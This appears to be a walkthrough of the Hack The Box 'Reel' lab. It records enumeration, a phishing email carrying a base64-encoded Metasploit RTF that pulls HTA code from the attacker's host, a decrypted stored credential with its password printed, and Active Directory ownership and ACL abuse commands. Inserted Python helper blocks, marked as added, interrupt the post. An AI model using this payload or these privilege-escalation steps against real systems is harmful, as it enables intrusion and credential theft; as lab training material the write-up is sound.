
Reel HTB

Nmap

# Nmap 7.91 scan initiated Mon Jul 26 09:36:58 2021 as: /usr/bin/nmap -sCV -p21,22,25,135,139,445,593,49159 --open -oN nmap/Script_10.129.1.151.nmap --system-dns --stats-every 2s 10.129.1.151
Nmap scan report for 10.129.1.151
Host is up (0.26s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP, 
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.91%I=7%D=7/26%Time=60FE34EA%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 26 09:45:07 2021 -- 1 IP address (1 host up) scanned in 488.60 seconds

Enumeration

Port 21

Anonymous login is enabled.

$ ftp 10.129.1.151
Connected to 10.129.1.151.
220 Microsoft FTP Service
Name (10.129.1.151:bharath): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-29-18  12:19AM       <DIR>          documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-29-18  12:19AM                 2047 AppLocker.docx
05-28-18  02:01PM                  124 readme.txt
10-31-17  10:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> mget *
mget AppLocker.docx? y
200 PORT command successful.
125 Data connection already open; Transfer starting.
y
WARNING! 9 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
2047 bytes received in 0.53 secs (3.7484 kB/s)
mget readme.txt? y
200 PORT command successful.
y
125 Data connection already open; Transfer starting.
226 Transfer complete.
124 bytes received in 0.34 secs (0.3611 kB/s)
mget Windows Event Forwarding.docx? y
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 51 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
14581 bytes received in 0.67 secs (21.2071 kB/s)
ftp> 

We have three files: one readme and two docx files.

Readme.txt [Pasted image 20210726102608.png]

Applocker.docx

[Pasted image 20210726103201.png]

Windows Event Forwarding.docx seems to be a corrupted file.

[Pasted image 20210726103239.png]

[Pasted image 20210726103419.png]

We have a user, nico@megabank.com. Let’s make a note of the domain and the user.

Let’s fix the corrupted file (renamed to windows.zip, since a docx is a zip archive), read its contents and see if anything is useful.

$ zip -FF windows.zip --out Fixed/out.zip
Fix archive (-FF) - salvage what can
 Found end record (EOCDR) - says expect single disk archive
Scanning for entries...
 copying: [Content_Types].xml  (385 bytes)
 copying: _rels/.rels  (243 bytes)
 copying: word/_rels/document.xml.rels  (290 bytes)
 copying: word/document.xml  (2337 bytes)
 copying: word/theme/theme1.xml  (1704 bytes)
 copying: word/settings.xml  (925 bytes)
 copying: word/webSettings.xml  (258 bytes)
 copying: word/stylesWithEffects.xml  (1991 bytes)
 copying: word/styles.xml  (1862 bytes)
 copying: word/fontTable.xml  (543 bytes)
 copying: docProps/app.xml  (481 bytes)
Central Directory found...
no local entry: docProps/core.xml
EOCDR found ( 1  14558)...
$ unzip out.zip
Archive:  out.zip
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: word/webSettings.xml    
  inflating: word/stylesWithEffects.xml   bad CRC 28f601f3  (should be 6e6ce0c8)
  inflating: word/styles.xml         
  inflating: word/fontTable.xml      
  inflating: docProps/app.xml     

After extracting the zip file, we try to read word/document.xml. [Pasted image 20210726105541.png]

Let’s format it and read the information. It’s a huge file, so I am only attaching the relevant part.

[Pasted image 20210726105725.png]

We have a domain. Let’s add it to our /etc/hosts file.

[Pasted image 20210726110003.png]
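The steps above (salvage the zip, pull word/document.xml out of it, read the text and note the user and domain) can be done in one place. The following is an added example and not code from the post: it builds a small constructed .docx in memory, deliberately damages one member's CRC the way the unzip output above reported, reads the document text anyway by inflating the raw deflate stream when zipfile refuses the member, and then extracts e-mail addresses and domains from the paragraphs. Only nico@megabank.com and megabank.htb are taken from the post; the sentences around them are made up, and the hostname regex is a simple one-liner, not a full validator.

```python
"""Recover text and identity indicators from a (possibly damaged) .docx.

Added example, not from the writeup. A .docx is a zip; body text sits in
word/document.xml as <w:t> runs. zipfile raises BadZipFile for a member
whose CRC does not match, so the reader falls back to inflating the raw
deflate stream itself, as unzip did for the bad-CRC member above.
"""
import io
import re
import struct
import zipfile
import zlib
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
HOST_RE = re.compile(r"(?<![\w.@-])[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\b")


def build_sample_docx():
    """Constructed minimal .docx with only the parts text extraction needs."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body>'
        "<w:p><w:r><w:t>Windows Event Forwarding</w:t></w:r></w:p>"
        "<w:p><w:r><w:t>Send any questions to </w:t></w:r>"
        "<w:r><w:t>nico@megabank.com</w:t></w:r></w:p>"
        "<w:p><w:r><w:t>Domain: megabank.htb</w:t></w:r></w:p>"
        "</w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def corrupt_crc(data, name):
    """Constructed damage for the demo: overwrite the member's stored CRC-32."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        crc = zf.getinfo(name).CRC
    return data.replace(struct.pack("<I", crc), struct.pack("<I", crc ^ 0xFFFFFFFF))


def crc_rejected(data, name):
    """True if zipfile's own reader refuses the member because of its CRC."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            zf.read(name)
        return False
    except zipfile.BadZipFile:
        return True


def read_member_ignore_crc(zf, name):
    """zf.read(name), but on a CRC mismatch inflate the raw stream anyway."""
    try:
        return zf.read(name)
    except zipfile.BadZipFile:
        info = zf.getinfo(name)
        fp = zf.fp
        fp.seek(info.header_offset)
        local_header = fp.read(30)  # fixed part of the local file header
        name_len, extra_len = struct.unpack("<HH", local_header[26:30])
        fp.seek(info.header_offset + 30 + name_len + extra_len)
        raw = fp.read(info.compress_size)
        if info.compress_type == zipfile.ZIP_STORED:
            return raw
        return zlib.decompress(raw, -15)  # raw deflate, no zlib header


def docx_paragraphs(data):
    """One string per <w:p>, joining its <w:t> runs; empty paragraphs dropped."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        xml_bytes = read_member_ignore_crc(zf, "word/document.xml")
    root = ET.fromstring(xml_bytes)
    paragraphs = []
    for p in root.iter(f"{{{W_NS}}}p"):
        text = "".join(t.text or "" for t in p.iter(f"{{{W_NS}}}t"))
        if text.strip():
            paragraphs.append(text)
    return paragraphs


def indicators(paragraphs):
    """(emails, domains) found in the text; e-mail domains count as domains."""
    emails, domains = set(), set()
    for para in paragraphs:
        for addr in EMAIL_RE.findall(para):
            emails.add(addr)
            domains.add(addr.split("@", 1)[1].lower())
        domains.update(h.lower() for h in HOST_RE.findall(para))
    return sorted(emails), sorted(domains)


if __name__ == "__main__":
    damaged = corrupt_crc(build_sample_docx(), "word/document.xml")
    paras = docx_paragraphs(damaged)
    print("\n".join(paras))
    print(indicators(paras))
```

The raw-inflate fallback is what makes this useful on a file like the one above: the central directory still records each member's offset and compressed size, so a wrong CRC only means the data may be partly damaged, not that it is unreadable. Anything the regexes pull out of such a file should be treated as a lead to confirm, not as fact.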

Port 25

We can send mail to nico@megabank.htb, which we have from the details in the Word file found on FTP.

We will use the swaks tool to send the mail, but first let’s look at the SMTP service by hand.

$ telnet 10.129.1.151 25
Trying 10.129.1.151...
Connected to 10.129.1.151.
Escape character is '^]'.
220 Mail Service ready
ehlo megabank.htb
250-REEL
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
VRFY nico@megabank.htb
502 VRFY disallowed.

VRFY is disabled, so we can’t verify whether the user exists that way.

Let’s make a small users.txt file to check whether we can send to any user.

cat users.txt
nico@megabank.htb
nico@reel.htb
root@reel.htb
tinyb0y@reel.htb
tinyb0y@htb.local
nico@htb.local
nico@wef.htb.local
root@wef.htb.local
tinyb0y@wef.htb.local
administrator@htb.local
administrator@megabank.local
administrator@wef.htb.local
admin@htb.local
admin@megabank.local
admin@wef.htb.local
$ smtp-user-enum -M RCPT -U users.txt -t 10.129.1.151
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Mon Jul 26 12:53:55 2021 #########
10.129.1.151: tinyb0y@htb.local exists
10.129.1.151: tinyb0y@reel.htb exists
10.129.1.151: nico@reel.htb exists
10.129.1.151: nico@megabank.htb exists
10.129.1.151: root@reel.htb exists
10.129.1.151: nico@htb.local exists
10.129.1.151: nico@wef.htb.local exists
10.129.1.151: root@wef.htb.local exists
10.129.1.151: tinyb0y@wef.htb.local exists
10.129.1.151: administrator@htb.local exists
10.129.1.151: administrator@megabank.local exists
10.129.1.151: admin@megabank.local exists
10.129.1.151: admin@htb.local exists
10.129.1.151: administrator@wef.htb.local exists
10.129.1.151: admin@wef.htb.local exists
######## Scan completed at Mon Jul 26 12:54:00 2021 #########
15 results.

15 queries in 5 seconds (3.0 queries / sec)

So this confirms we can send to any user: the server accepts every recipient we tried.
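Every one of the 15 addresses came back as "exists", including names that were only guesses (tinyb0y, root) and domains the host does not even advertise. That is the signature of a catch-all MTA: RCPT TO is answered 250 regardless, so the output proves the server will queue mail for anyone but says nothing about which accounts are real. The following is an added example and not a tool from the post: it parses the users.txt and smtp-user-enum output shown above and reports whether the run looks like a catch-all. Treating tinyb0y and root as control names is an assumption made here for the demonstration.

```python
"""Sanity-check smtp-user-enum RCPT results for catch-all behaviour.

Added example, not from the writeup. If improbable control addresses are
accepted too, the 'exists' list carries no information about real users.
"""
import re

# users.txt as shown in the post.
USERS_TXT = """nico@megabank.htb
nico@reel.htb
root@reel.htb
tinyb0y@reel.htb
tinyb0y@htb.local
nico@htb.local
nico@wef.htb.local
root@wef.htb.local
tinyb0y@wef.htb.local
administrator@htb.local
administrator@megabank.local
administrator@wef.htb.local
admin@htb.local
admin@megabank.local
admin@wef.htb.local"""

# Result lines as printed by smtp-user-enum in the post (banner omitted).
ENUM_OUTPUT = """10.129.1.151: tinyb0y@htb.local exists
10.129.1.151: tinyb0y@reel.htb exists
10.129.1.151: nico@reel.htb exists
10.129.1.151: nico@megabank.htb exists
10.129.1.151: root@reel.htb exists
10.129.1.151: nico@htb.local exists
10.129.1.151: nico@wef.htb.local exists
10.129.1.151: root@wef.htb.local exists
10.129.1.151: tinyb0y@wef.htb.local exists
10.129.1.151: administrator@htb.local exists
10.129.1.151: administrator@megabank.local exists
10.129.1.151: admin@megabank.local exists
10.129.1.151: admin@htb.local exists
10.129.1.151: administrator@wef.htb.local exists
10.129.1.151: admin@wef.htb.local exists
15 results."""

RESULT_RE = re.compile(r"^(?P<target>[\d.]+): (?P<addr>\S+@\S+) exists$")


def parse_users(text):
    """Addresses from a users.txt-style list, one per line."""
    return [line.strip() for line in text.splitlines() if "@" in line]


def parse_accepted(output):
    """Addresses the tool reported as existing (server answered 250 to RCPT TO)."""
    accepted = set()
    for line in output.splitlines():
        m = RESULT_RE.match(line.strip())
        if m:
            accepted.add(m.group("addr"))
    return accepted


def assess(queried, accepted, control_users=("tinyb0y", "root")):
    """Summarise a run. control_users (an assumption here) are local parts that
    were guesses rather than known accounts; if every control is accepted, the
    server is most likely a catch-all and the result list is not evidence."""
    queried = set(queried)
    controls = {a for a in queried if a.split("@", 1)[0] in control_users}
    controls_accepted = controls & accepted
    return {
        "queried": len(queried),
        "accepted": len(accepted & queried),
        "controls": len(controls),
        "controls_accepted": len(controls_accepted),
        "domains_accepted": sorted({a.split("@", 1)[1] for a in accepted}),
        "catch_all_likely": bool(controls) and controls_accepted == controls,
    }


if __name__ == "__main__":
    verdict = assess(parse_users(USERS_TXT), parse_accepted(ENUM_OUTPUT))
    for key, value in verdict.items():
        print(f"{key:18} {value}")
```

The domains_accepted field is the second tell: an MTA that validates recipients would not accept megabank.local and wef.htb.local alongside the domain it actually serves. From the defensive side the same check explains why rejecting unknown recipients at RCPT time is a trade-off: it stops a queue from filling with mail for nonexistent users, but it also hands an outside sender a user-existence oracle.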

After searching for a while I found an exploit.

Description of Vulnerability (from the module page): This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.

References:
https://www.youtube.com/watch?v=Esg-K4ARzkM
https://www.rapid7.com/db/modules/exploit/windows/fileformat/office_word_hta/

[Pasted image 20210726130704.png]

$ swaks --to nico@megabank.htb --header "Subject: test" --body "Please Check the doc file" --attach msf.rtf --server 10.129.1.151
*** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the future.  Prefix filenames with '@' instead.
=== Trying 10.129.1.151:25...                                                                                                  
=== Connected to 10.129.1.151.                                                                                                 
<-  220 Mail Service ready                                                                                                     
 -> EHLO bharath                                                                                                               
<-  250-REEL                                                                                                                   
<-  250-SIZE 20480000                                                                                                          
<-  250-AUTH LOGIN PLAIN                                                                                                       
<-  250 HELP                                                                                                                   
 -> MAIL FROM:<bharath@bharath>                                                                                                
<-  250 OK                                                                                                                     
 -> RCPT TO:<nico@megabank.htb>                                                                                                
<-  250 OK                                                                                                                     
 -> DATA                                                                                                                       
<-  354 OK, send.                                                                                                              
 -> Date: Mon, 26 Jul 2021 13:03:16 +0530                                                                                      
 -> To: nico@megabank.htb                                                                                                      
 -> From: root@root                                                                                                      
 -> Subject: test                                                                                                              
 -> Message-Id: <20210726130316.024887@bharath>                                                                                
 -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/                                                                   
 -> MIME-Version: 1.0                                                                                                          
 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_24887"                                                    
 ->                                                                                                                            
 -> ------=_MIME_BOUNDARY_000_24887                                                                                            
 -> Content-Type: text/plain                                                                                                   
 ->                                                                                                                            
 -> Please Check the doc file                                                                                                  
 -> ------=_MIME_BOUNDARY_000_24887                                                                                            
 -> Content-Type: application/octet-stream; name="msf.rtf"                                                                     
 -> Content-Description: msf.rtf                                                                                               
 -> Content-Disposition: attachment; filename="msf.rtf"                                                                        
 -> Content-Transfer-Encoding: BASE64
 ->                                                            
 -> e1xydGYxXGFkZWZsYW5nMTAyNVxhbnNpXGFuc2ljcGcxMjUyXHVjMVxhZGVmZjMxNTA3XGRlZmYw                                               
 -> XHN0c2hmZGJjaDMxNTA1XHN0c2hmbG9jaDMxNTA2XHN0c2hmaGljaDMxNTA2XHN0c2hmYmkzMTUw                                               
 -> N1xkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUyXHRoZW1lbGFuZzEwMzNcdGhlbWVsYW5nZmUyMDUy                                               
 -> XHRoZW1lbGFuZ2NzMAp7XGluZm8Ke1xhdXRob3IgTWljcm9zb2Z0fQp7XG9wZXJhdG9yIE1pY3Jv                                               
 -> c29mdH0KfQp7XCpceG1sbnN0Ymwge1x4bWxuczEgaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNv                                               
 -> bS9vZmZpY2Uvd29yZC8yMDAzL3dvcmRtbH19CnsKe1xvYmplY3Rcb2JqYXV0bGlua1xvYmp1cGRh                                               
 -> dGVccnNsdHBpY3Rcb2JqdzI5MVxvYmpoMjMwXG9ianNjYWxleDk5XG9ianNjYWxleTEwMQp7XCpc                                               
 -> b2JqY2xhc3MgV29yZC5Eb2N1bWVudC44fQp7XCpcb2JqZGF0YSAwMTA1MDAwMDAyMDAwMDAwCjA5                                               
 -> MDAwMDAwNGY0YzQ1MzI0YzY5NmU2YjAwMDAwMDAwMDAwMDAwMDAwMDAwMGEwMDAwCmQwY2YxMWUw                                               
 -> YTFiMTFhZTEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDNlMDAwMzAwZmVmZjA5MDAw                                               
 -> NjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDEwMDAwMDAy  
 -------
 STRIP
 -------
  -> CjAxMDAwMDAyMDkwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMGE0MDAwMDAw                                               
 -> ZTBjOWVhNzlmOWJhY2UxMThjODIwMGFhMDA0YmE5MGI4YzAwMDAwMDY4MDA3NDAwNzQwMDcwMDAz                                               
 -> YTAwMmYwMDJmMDAzMTAwMzAwMDJlMDAzMTAwMzAwMDJlMDAzMTAwMzcwMDJlMDAzMTAwMzgwMDM5                                               
 -> MDAzYTAwMzgwMDMwMDAzODAwMzAwMDJmMDA2NDAwNjUwMDY2MDA2MTAwNzUwMDZjMDA3NDAwMmUw                                               
 -> MDY4MDA3NDAwNjEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA3OTU4ODFmNDNiMWQ3                                               
 -> ZjQ4YWYyYzgyNWRjNDg1Mjc2MzAwMDAwMDAwYTVhYjAwMDBmZmZmZmZmZjA2MDkwMjAwMDAwMDAw                                               
 -> MDBjMDAwMDAwMDAwMDAwMDQ2MDAwMDAwMDBmZmZmZmZmZjAwMDAwMDAwMDAwMDAwMDA5MDY2NjBh                                               
 -> NjM3YjVkMjAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MTAwMjAzMDAwZDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw                                               
 -> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAK                                               
 -> MDEwNTAwMDAwMDAwMDAwMH0Ke1xyZXN1bHQge1xydGxjaFxmY3MxIFxhZjMxNTA3IFxsdHJjaFxm                                               
 -> Y3MwIFxpbnNyc2lkMTk3OTMyNCB9fX19CntcKlxkYXRhc3RvcmUgfQp9Cg==                                                               
 ->                                                                                                                            
 -> ------=_MIME_BOUNDARY_000_24887--                                                                                          
 ->                                                                                                                            
 ->                                                                                                                            
 -> .                                                                                                                          
<-  250 Queued (12.610 seconds)                                                                                                
 -> QUIT                                                                                                                       
<-  221 goodbye                                                                                                                
=== Connection closed with remote host.  

[Pasted image 20210726131129.png]

We have a successful meterpreter session. Let’s use it.

meterpreter > sysinfo
Computer        : REEL
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 6
Meterpreter     : x86/windows
meterpreter > 

[Pasted image 20210726131519.png]

We have the user flag. Now let’s escalate to Administrator.

[Pasted image 20210726132121.png]

There is an Active Directory domain on the machine. Ports 88, 389 and 636 are generally used for AD/LDAP.

We found a cred.xml file which contains a password for the user tom in the domain HTB.

[Pasted image 20210726132756.png]

Let’s get the password from the SecureString. Import-CliXml decrypts it with DPAPI under the current user’s profile, so this only works in the context of the account that exported it, on this host.

https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx

[Pasted image 20210726135619.png]

PS > $credential = Import-CliXml -Path .\cred.xml
PS > $credential.GetNetworkCredential().Password
1ts-mag1c!!!

User: tom Pass: 1ts-mag1c!!!

SSH is open on the box. Let’s log in with these creds.

$ ssh tom@10.129.1.151
The authenticity of host '10.129.1.151 (10.129.1.151)' can't be established.
ECDSA key fingerprint is SHA256:jffiqnVqz/MrcDasdsjISFIcN/xtlDj1C76Yu1mDQVY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
Warning: Permanently added '10.129.1.151' (ECDSA) to the list of known hosts.
tom@10.129.1.151's password: 
Microsoft Windows [Version 6.3.9600]                                                                                             
(c) 2013 Microsoft Corporation. All rights reserved.                                                                             

tom@REEL C:\Users\tom>                                                             

[Pasted image 20210726135914.png]

We have an “AD Audit” directory which contains a note and a BloodHound directory.

tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt                                                                            
Findings:                                                                                                                       

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).                                  

Maybe we should re-run Cypher query against other groups we've created.

We have BloodHound/SharpHound.ps1.

Let’s copy a newer version of SharpHound onto the box and collect the domain information.

PS C:\Users\tom\Downloads> dir                                                                                                


    Directory: C:\Users\tom\Downloads                                                                                         


Mode                LastWriteTime     Length Name                                                                             
----                -------------     ------ ----                                                                             
-a---         7/26/2021   9:53 AM     973735 SharpHound.ps1                                                                   


PS C:\Users\tom\Downloads> .\SharpHound.ps1                                       
PS C:\Users\tom\Downloads> import-module .\SharpHound.ps1                                                                     
PS C:\Users\tom\Downloads>  invoke-bloodhound -collectionmethod all -domain HTB.LOCAL -LDAPUser tom -LDAPPass '1ts-mag1c!!!'  
-----------------------------------------------                                                                               
Initializing SharpHound at 9:53 AM on 7/26/2021                                                                               
-----------------------------------------------                                                                               

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container          

[+] Creating Schema map for domain HTB.LOCAL using path CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL                            
[+] Cache File not Found: 0 Objects in cache                                                                                  

[+] Pre-populating Domain Controller SIDS                                                                                     
PS C:\Users\tom\Downloads> Status: 0 objects finished (+0) -- Using 102 MB RAM                                                
Status: 84 objects finished (+84 84)/s -- Using 108 MB RAM                                                                    
Enumeration finished in 00:00:01.5186167                                                                                      
Compressing data to C:\Users\tom\Downloads\20210726095354_BloodHound.zip                                                      
You can upload this file directly to the UI                                                                                   

SharpHound Enumeration Completed at 9:53 AM on 7/26/2021! Happy Graphing!                                                     

PS C:\Users\tom\Downloads>                                                                         

[Pasted image 20210726142544.png]

SharpHound generates a zip with all the domain information the tom user is able to collect. Let’s spin up the BloodHound UI on our local machine.

[Pasted image 20210726144044.png]

[Pasted image 20210726144540.png]

We have three domain administrators:

  • claire_da
  • brad_da
  • administrator

[Pasted image 20210726145341.png]

[Pasted image 20210726145445.png]

Let’s exploit it.

# Make tom owner of claire
> Set-DomainObjectOwner -Identity claire -OwnerIdentity tom

# Give tom all rights on claire

> Add-DomainObjectAcl -TargetIdentity claire -Rights All                                           

cmdlet Add-DomainObjectAcl at command pipeline position 1  
Supply values for the following parameters:                
PrincipalIdentity[0]: tom                                                         

